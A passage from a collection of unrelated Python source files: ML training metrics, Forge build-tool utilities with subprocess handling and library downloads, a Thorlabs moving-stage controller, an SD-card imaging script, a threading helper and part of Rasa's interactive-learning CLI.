precision, recall, f1 = f1_score(actuals, predicteds)
if ugh:
print("MSE: {}, acc: {}, f1: {} (precision: {}, recall: {})".format(MSE, acc, f1, precision, recall))
import sys
sys.exit(0)
return MSE, acc, f1
def train(oa, network, oaName, training_ints, validation_ints, testing_ints, measure, training_iterations, outfile):
"""Train a given network on a set of instances.
"""
# print("\nError results for %s\n---------------------------" % (oaName,))
times = [0]
for iteration in xrange(training_iterations):
start = time.clock()
oa.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
if iteration % 10 == 0:
MSE_trg, acc_trg, f1_trg = error_on_data_set(
network, training_ints, measure)
MSE_val, acc_val, f1_val = error_on_data_set(
network, validation_ints, measure)
MSE_tst, acc_tst, f1_tst = error_on_data_set(
network, testing_ints, measure)
txt = '{},{},{},{},{},{},{},{},{},{},{}\n'.format(iteration, MSE_trg, MSE_val, MSE_tst, acc_trg, acc_val,
acc_tst, f1_trg, f1_val, f1_tst, times[-1])
# print(txt)
write_to_file(outfile, txt)
|
utils.py
|
# XXX should consolidate this with lib
import logging
from os import path
import subprocess
import StringIO
import hashlib
import json
import sys
import os
import stat
import time
import threading
import Queue
import urlparse
import lib
from genshi.template import NewTextTemplate
LOG = logging.getLogger(__name__)
class ShellError(lib.BASE_EXCEPTION):
def __init__(self, message, output):
self.message = message
self.output = output
def __str__(self):
return "%s: %s" % (self.message, self.output)
# # # # # # # # # # # # # # # # # # #
#
# Data transform
# TODO XPath or similar?
#
# # # # # # # # # # # # # # # # # # #
def transform(data, node_steps, fn, allow_set=False):
'''Mutate an arbitrary nested dictionary/array combination with the given function.
``node_steps`` is dot-separated instructions on how to arrive at the data node
which needs changing::
array_name.[]
dictionary.key_name
dictionary.* // all keys in a dictionary
:param data: a nested dictionary / array combination
:type data: ``dict``
:param node_steps: dot-separated data path, e.g. my_dict.my_array.[].*.target_key
:param fn: mutating function - will be passed the data found at the end
``node_steps``, and should return the desired new value
:param allow_set: if True the mutating function will be called with None for none
existing keys - i.e. you can set new keys
'''
obj = data.copy()
list(_handle_all(obj, node_steps.split('.'), fn, allow_set))
return obj
def _yield_plain(obj, name):
'If obj is a dictionary, yield an attribute'
if hasattr(obj, '__contains__') and name in obj:
yield obj[name]
def _yield_array(obj):
'Yield all elements of an array'
assert hasattr(obj, '__iter__'), 'Expecting an array, got %s' % obj
for thing in obj:
yield thing
def _yield_asterisk(obj):
'Yield all values in a dictionary'
if hasattr(obj, 'iteritems'):
for _, value in obj.iteritems():
yield value
def _yield_any(obj, name):
'Yield a value, or array or dictionary values'
if name == '*':
return _yield_asterisk(obj)
elif name == '[]':
return _yield_array(obj)
else:
return _yield_plain(obj, name)
def recurse_dict(dictionary, fn):
'''
if the property isn't a string, recurse till it is
'''
for key, value in dictionary.iteritems():
if hasattr(value, 'iteritems'):
recurse_dict(value, fn)
else:
dictionary[key] = fn(value)
def _handle_all(obj, steps, fn, allow_set):
if len(steps) > 1:
for value in _yield_any(obj, steps[0]):
for x in _handle_all(value, steps[1:], fn, allow_set):
yield x
else:
step = steps[0]
if step == '*':
assert hasattr(obj, 'iteritems'), 'Expecting a dictionary, got %s' % obj
recurse_dict(obj, fn)
elif step == '[]':
assert hasattr(obj, '__iter__'), 'Expecting an array, got %s' % obj
for i, x in enumerate(obj):
obj[i] = fn(x)
else:
if hasattr(obj, '__contains__') and step in obj:
obj[step] = fn(obj[step])
elif allow_set:
obj[step] = fn(None)
# # # # # # # # # # # # # # # # # # #
#
# End data transform
#
# # # # # # # # # # # # # # # # # # #
def render_string(config, in_s):
'''Render a Genshi template as a string
:param config: data dictionary
:param in_s: genshi template
'''
tmpl = NewTextTemplate(in_s)
# older versions of python don't allow unicode keyword arguments
# so we have to encode the keys (for best compatibility in the client side tools)
config = _encode_unicode_keys(config)
return tmpl.generate(**config).render('text').decode('utf8')
def _encode_unicode_keys(dictionary):
'''Returns a new dictionary constructed from the given one, but with the keys encoded as strings.
:param dictionary: dictionary to encode the keys for
(For use with old versions of python that can't use unicode keys for keyword arguments)'''
new_items = [(str(k), v) for k, v in dictionary.items()]
return dict(new_items)
def _resolve_url(config, url, prefix):
'''Prefix non-absolute URLs with the path to the user's code'''
if hasattr(url, "startswith"):
# string
if url.startswith('http://') or \
url.startswith('https://') or \
url.startswith(prefix):
return url
else:
return prefix + url if url.startswith('/') else prefix + '/' + url
else:
# summat else
return url
class RunnerState(object):
pass
class ProcessGroup(object):
"""Helper for managing a collection of processes and ensuring they're all shut down."""
def __init__(self):
self._running_processes = {}
self._notifications = Queue.Queue()
self._procs = 0
def spawn(self, *args, **kw):
"""Create (and start) a new process."""
self._procs += 1
group_id = self._procs
proc = ProcessWithLogging(group_id, self._notifications, *args, **kw)
proc.start()
self._running_processes[group_id] = proc
def wait_for_success(self):
"""Wait for every process to succeed.
If one process fails, shuts all the other processes down.
If an interrupt is received from the tools, shuts all processes down.
"""
call = lib.current_call()
try:
while self._running_processes != {}:
try:
finished_pid = self._notifications.get(timeout=1)
finished_proc = self._running_processes[finished_pid]
finished_proc.assert_success()
del self._running_processes[finished_pid]
except Queue.Empty:
call.assert_not_interrupted()
finally:
self._shutdown_running_processes()
def _shutdown_running_processes(self):
for pid, proc in self._running_processes.items():
proc.kill()
class ProcessWithLogging(object):
"""Wrapper around a subprocess.Popen
Logs output from it the subprocess.
Notifies through a queue when it has finished.
"""
def __init__(self, group_id, notify, args, **kw):
self._notify = notify
self._group_id = group_id
self._args = args
self._check_for_interrupt = kw.get('check_for_interrupt', False)
self._command_log_level = kw.get("command_log_level", logging.DEBUG)
self._filter = kw.get("filter", False)
self._env = kw.get("env")
self._fail_if = kw.get("fail_if")
self._state = RunnerState()
self._state.done = False
self._state.output = StringIO.StringIO()
self._state.proc = None
self._state.error = None
self._process_launched = Queue.Queue()
def start(self):
self._runner_thread = threading.Thread(target=self._runner)
self._runner_thread.daemon = True
self._runner_thread.start()
self._wait_until_process_started()
def _wait_until_process_started(self):
try:
process_launched = self._process_launched.get(timeout=20)
except Queue.Empty:
raise ShellError('Failed to start up subprocess "%s", took longer than 20 seconds.', output='')
if process_launched != self.PROCESS_START_SUCCESS:
raise self._state.error
def pid(self):
return self._state.proc.pid
def assert_success(self):
assert self._state.done
if self._state.error:
raise self._state.error
def kill(self):
import lib
lib.progressive_kill(self._state.proc.pid)
PROCESS_START_SUCCESS = 9001
PROCESS_START_FAILURE = 9002
PROCESS_FINISH_SUCCESS = 9003
PROCESS_EXCEPTION = 9004
def _runner(self):
try:
self._state.proc = lib.PopenWithoutNewConsole(self._args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=self._env)
self._process_launched.put(self.PROCESS_START_SUCCESS)
for line in iter(self._state.proc.stdout.readline, ''):
if not self._filter or self._filter(line):
self._state.output.write(line)
LOG.log(self._command_log_level, line.rstrip('\r\n'))
if self._fail_if and self._fail_if(line):
raise ShellError('Detected failure based on output of subprocess "%s"' % self._args[0], self._state.output.getvalue())
except Exception as e:
if self._state.proc is None:
self._process_launched.put(self.PROCESS_START_FAILURE)
else:
self._process_launched.put(self.PROCESS_EXCEPTION)
self._state.error = e
finally:
self._finished()
def _finished(self):
self._state.done = True
self._notify.put(self._group_id)
# TODO: extract common logic in ProcessWithLogging and run_shell
def _required_preexec(create_process_group, os):
if create_process_group and getattr(os, 'setsid', None) is not None:
return os.setsid
def run_shell(*args, **kw):
check_for_interrupt = kw.get('check_for_interrupt', False)
create_process_group = kw.get('create_process_group', False)
fail_silently = kw.get('fail_silently', False)
command_log_level = kw.get("command_log_level", logging.DEBUG)
filter = kw.get("filter", False)
state = RunnerState()
state.done = False
state.output = StringIO.StringIO()
state.proc = None
state.error = None
def runner():
try:
preexec_fn = _required_preexec(create_process_group, os)
state.proc = lib.PopenWithoutNewConsole(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=kw.get('env'), preexec_fn=preexec_fn)
for line in iter(state.proc.stdout.readline, ''):
if filter:
line = filter(line)
if line != False:
state.output.write(line)
LOG.log(command_log_level, line.rstrip('\r\n'))
state.done = True
except Exception as e:
state.done = True
state.error = e
if check_for_interrupt:
try:
call = lib.current_call()
runner_thread = threading.Thread(target=runner)
runner_thread.daemon = True
runner_thread.start()
while not state.done:
time.sleep(1)
call.assert_not_interrupted()
finally:
# if interrupted, kill child process
if state.proc and not state.done:
lib.progressive_kill(state.proc.pid, kill_process_group=create_process_group)
else:
runner()
if state.error:
raise state.error
if state.proc.wait() != 0:
if fail_silently:
LOG.debug('Failed to run %s, but was told to carry on anyway' % subprocess.list2cmdline(args))
else:
raise ShellError(
message="Failed when running {command}".format(command=args[0]),
output=state.output.getvalue()
)
return state.output.getvalue()
def which(program):
"http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python"
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
if sys.platform.startswith("win"):
programs = [".".join((program, extension)) for extension in ("cmd", "exe", "bat")]
programs.insert(0, program)
else:
programs = [program]
for program_name in programs:
fpath, fname = os.path.split(program_name)
if fpath:
if is_exe(program_name):
LOG.debug("using {name} for {program}".format(
name=program_name, program=program))
return program_name
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program_name)
if is_exe(exe_file):
LOG.debug("using {name} for {program}".format(
name=exe_file, program=program))
return exe_file
return None
def ensure_lib_available(cookies, platform_version, file):
if 'FORGE_PLATFORM_LOCATION' in os.environ:
return path.abspath(path.join(os.environ['FORGE_PLATFORM_LOCATION'], 'generate', 'lib', file))
module_dynamic_path = path.split(path.abspath(__file__))[0]
lib_dir = path.abspath(path.join(module_dynamic_path, '..', '..', '.lib'))
hash_path = path.abspath(path.join(module_dynamic_path, '..', 'hash.json'))
if not path.exists(lib_dir):
os.makedirs(lib_dir)
# Hide directory on windows
if sys.platform == 'win32':
try:
lib.PopenWithoutNewConsole(['attrib', '+h', lib_dir]).wait()
except Exception:
# don't care if we fail to hide the templates dir
pass
from trigger import forge_tool
remote = forge_tool.singleton.remote
server_details = urlparse.urlparse(remote.server)
if not path.exists(hash_path):
url = "{protocol}://{netloc}/lib-static/{platform_version}/{file}".format(
protocol=server_details.scheme,
netloc=server_details.netloc,
platform_version=platform_version,
file='hash.json'
)
remote._get_file(url, hash_path, cookies=cookies)
with open(hash_path, 'r') as hash_file:
hashes = json.load(hash_file)
file_path = path.join(lib_dir, file)
if path.exists(file_path) and file in hashes:
# Check hash
with open(file_path, 'rb') as cur_file:
hash = hashlib.md5(cur_file.read()).hexdigest()
if hash == hashes[file]:
# File exists and is correct
LOG.debug("File: %s, already downloaded and correct." % file)
return file_path
# File doesn't exist, or has the wrong hash or has no known hash - download
LOG.info("Downloading lib file: %s, this will only happen when a new file is available." % file)
url = "{protocol}://{netloc}/lib-static/{platform_version}/{file}".format(
protocol=server_details.scheme,
netloc=server_details.netloc,
platform_version=platform_version,
file=file
)
remote._get_file(url, file_path, cookies=cookies)
# Make file executable.
os.chmod(file_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
return file_path
|
thorlabs_apt_moving_stage.py
|
########################################################################
#
# This module contains classes for controlling and displying properties
# of the APT Thorlabs moving stage
#
########################################################################
import multiprocessing
from consts import *
########################################################################
#
# Managing class that communicates with the process where
# the device resides
#
########################################################################
class ManagerThorlabsAPTMovingStage :
"""
Class that manges the moving stage
"""
def __init__ (self, SerialNumber) :
# Create the lock for device
self.lock = multiprocessing.Lock()
# Create a pipe for communication
self.parent_connection, self.child_connection = multiprocessing.Pipe()
# Saving the serial number
self.SerialNumber = SerialNumber
def __del__ (self) :
self.parent_connection.close()
self.child_connection.close()
def start(self) :
"""
Start the process controlling the moving stage
"""
p = multiprocessing.Process(target=MovingStageProc, args=(self.SerialNumber,self.child_connection))
p.start()
return p
def run(self, command, arguments=None) :
"""
Send the command to a moving stage through the pipe
"""
self.lock.acquire()
self.parent_connection.send( (command, arguments) )
result = self.parent_connection.recv()
self.lock.release()
return result
def exit(self) :
"""
Close the process
"""
return self.run("Exit")
def AbsMove(self, position) :
"""
Move the moving stage without waiting the completion of the motion.
"""
return self.run( "AbsMove", position )
def AbsMoveWait(self, position) :
"""
Move the moving stage and wait till completion
"""
return self.run( "AbsMoveWait", position )
########################################################################
#
# Process where the device resides
#
########################################################################
def MovingStageProc(SerialNumber, pipe) :
"""
This function will be run as a separate process
"""
import wx.lib.activex, threading
class ThorlabsAPTMovingStage (wx.lib.activex.ActiveXCtrl) :
"""
Control moving stage
"""
def __init__ (self, SerialNumber, pipe) :
self.frame = wx.Frame (None, title="Moving stage SN: %d" % SerialNumber)
panel = wx.Panel (self.frame)
wx.lib.activex.ActiveXCtrl.__init__ (self, panel, 'MGMOTOR.MGMotorCtrl.1', size=self.frame.GetSizeTuple(), name='Moving stage')
# Initializing the device by specifying its serial number
self.ctrl.StartCtrl()
self.ctrl.HWSerialNum = SerialNumber
self.ctrl.Identify()
# Building simple gui
sizer = wx.BoxSizer ()
sizer.Add (self, flag=wx.EXPAND)
panel.SetSizer (sizer)
self.frame.Show()
#self.frame.Hide()
# saving the pipe
self.pipe = pipe
# starting thread for checking commands sent from other processes
threading.Thread(target=self.CheckCommands).start()
def AbsMove (self, possition) :
self.ctrl.SetAbsMovePos(0, possition)
self.ctrl.MoveAbsolute(0,0)
return RETURN_SUCCESS
def AbsMoveWait (self, position) :
self.AbsMove(position)
# Wait till movement finishes
status = 0xFF
while ((status >> 5)&0x1)|((status >> 6)&0x1) : status = self.ctrl.GetStatusBits_Bits(0)
return RETURN_SUCCESS
def CheckCommands (self) :
# Checking the pipe for requested commands
# until "Exit" is sent
for command, arguments in iter(self.pipe.recv, ("Exit",None)) :
# Run requested command
try :
try : result = getattr(self, command)(arguments)
except RuntimeError, e :
result = RETURN_FAIL; print e.message;
except AttributeError :
print "\n\nPulse Shaper Error : Unrecognised command: " + command
result = RETURN_FAIL
# returning the result
self.pipe.send(result)
# Closing the process
wx.CallAfter(self.frame.Close)
self.pipe.send(RETURN_SUCCESS)
# Starting the wx application
wx_app = wx.PySimpleApp(False)
shutter = ThorlabsAPTMovingStage(SerialNumber, pipe)
wx_app.MainLoop()
|
para_example.py
|
import multiprocessing
import numpy as np
def worker(i, return_dict):
# return_dict[i] = np.random.normal(size=5)
return_dict.append(np.random.normal(size=5))
if __name__ == '__main__':
manager = multiprocessing.Manager()
return_dict = manager.list()
jobs = []
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
print(return_dict)
# print (return_dict.values())
|
shellController.py
|
import pyudev
import re
import subprocess
from threading import Thread
import sys
from subprocess import Popen, PIPE, CalledProcessError
class ShellController:
def __init__(self):
self.udev_context = pyudev.Context()
self.local_dir = "/mnt/drive1/pisd_images/"
self.usb_mnt_dir = "/media/pisdImager/"
self.dd_prog_msg = ""
self.status = ""
def formatDDOutput(self, msg):
msg_list = msg.split(" ")
if(len(msg_list) >= 10):
data_in_bytes = msg_list[0] + " " + msg_list[1]
data_moved = msg_list[2] + " " + msg_list[3] + " " + msg_list[4] + " " + msg_list[5] + " " + msg_list[6]
time_elapsed = msg_list[7]
speed = msg_list[9] + " " + msg_list[10]
data = {
"data_in_bytes": data_in_bytes,
"data_moved" : data_moved,
"time_elapsed" : float(time_elapsed),
"speed" : speed
}
print(data)
self.dd_prog_msg = data
def ddExec(self, command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
self.status="dd-copy"
line = ''
while True:
out = process.stderr.read(1)
# print(type(out))
if out == '' and process.poll() != None:
print("ending here")
break
if out != '':
s = out.decode("utf-8")
if s == '\r':
# self.formatDDOutput(line)
self.dd_prog_msg = line + "\n"
line = ''
else:
line = line + s
if out == b'':
print("wtf",out.decode('utf-8'))
break
except Exception as e:
print(str(e))
return "error"
def commandExec(self, command):
try:
out = subprocess.check_output(command, shell=True)
return out.decode().rstrip("\n")
except:
return "error"
def execute(self, cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
yield stdout_line
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
def PishrinkExec(self, command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
self.status="pishrink Process"
line = ''
while True:
out = process.stderr.read(1)
# print(type(out))
if out == '' and process.poll() != None:
print("ending here")
break
if out != '':
s = out.decode("utf-8")
if s == '\r':
print("pishrink", line)
line = ''
else:
line = line + s
if out == b'':
print("wtf",out.decode('utf-8'))
break
except Exception as e:
print(str(e))
return "error"
def USBDeviceList(self):
devices = {}
for device in self.udev_context.list_devices():
if(device.get('ID_USB_DRIVER') == "usb-storage" and device.get('DEVTYPE') == "disk"):
dev_name = device.get('DEVNAME')
devices[dev_name] = {
"path":dev_name,
"model":device.get("ID_MODEL")
}
return devices
def MakeSDImage(self, sd_card, output, bs="1M"):
cmd = ["dd", "if={}".format(sd_card), "of={}".format(output), "bs={}".format(bs), "status=progress"]
self.ddExec(cmd)
def PiShrink(self, file, tozip=True, reset=True):
cmd = ['pishrink.sh']
if(tozip):
cmd.append("-a")
cmd.append("-z")
if(reset):
cmd.append("-p")
cmd.append("-v")
cmd.append(file)
for out in self.execute(cmd):
self.dd_prog_msg = out
print(out, end="")
self.dd_prog_msg = "image zipped"
def ImageProcessor(self, sd_card, img_name, tozip=True, reset=True):
img_dir = self.local_dir+img_name
print("image name", img_dir)
self.MakeSDImage(sd_card, img_dir)
self.status = "Pi shrink"
self.PiShrink(img_dir, tozip, reset)
self.status = "Image Ready"
self.dd_prog_msg = "process complete"
self.dd_prog_msg = ""
if __name__ == "__main__":
sc = ShellController()
Thread(target=sc.ImageProcessor, args=('/dev/sdg', "test.img")).start()
# sc.ImageProcessor('/dev/sdg', "test.img", zip=False)
# 21404581888 bytes (21 GB, 20 GiB) copied, 726 s, 29.5 MB/s
# sc.formatDDOutput("21404581888 bytes (21 GB, 20 GiB) copied, 726 s, 29.5 MB/s")
# sc.MakeSDImage("/dev/sda", "python.img")
# sc.MakeSDImage("/dev/sdg", sc.local_dir+"python.img")
# sc.PiShrink(sc.local_dir+"python.img", zip=True)
# res = sc.USBDeviceList()
# print(res.keys())
# print(res['/dev/sda'].get('ID_MODEL'))
|
thread.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""Utility functions for operating with threads"""
import threading # noqa
from typing import Callable # noqa
def run_as_thread(function: Callable, *args) -> threading.Thread:
"""Runs a function in a thread, passing in the specified args as its arguments and returns the thread"""
task = threading.Thread(target=function, args=args)
task.setDaemon(False)
task.start()
return task
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload,
method="post",
subpath="/conversations/{}/messages".format(sender_id),
)
async def request_prediction(
endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath="/conversations/{}/predict".format(sender_id)
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name
)
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = "/conversations/{}/execute".format(sender_id)
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{0}', "
"with matching template: '{1}'. "
"This action will not return its message in this session, "
"but the new utterance will be saved to your domain file "
"when you exit and save this session. "
"You do not need to do anything further. "
"".format(action_name, [*NEW_TEMPLATES[action_name]][0])
)
await _ask_questions(warning_questions, sender_id, endpoint)
else:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name)
)
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_utterance(
sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
"Please type the message for your new utterance "
"template '{}':".format(action)
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), sender_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strs = _slot_history(tracker_dump)
print ("------")
print ("Chat History\n")
print (table)
if slot_strs:
print ("\n")
print ("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print ("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
"intent: {} {:03.2f}".format(intent_name, _confidence),
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
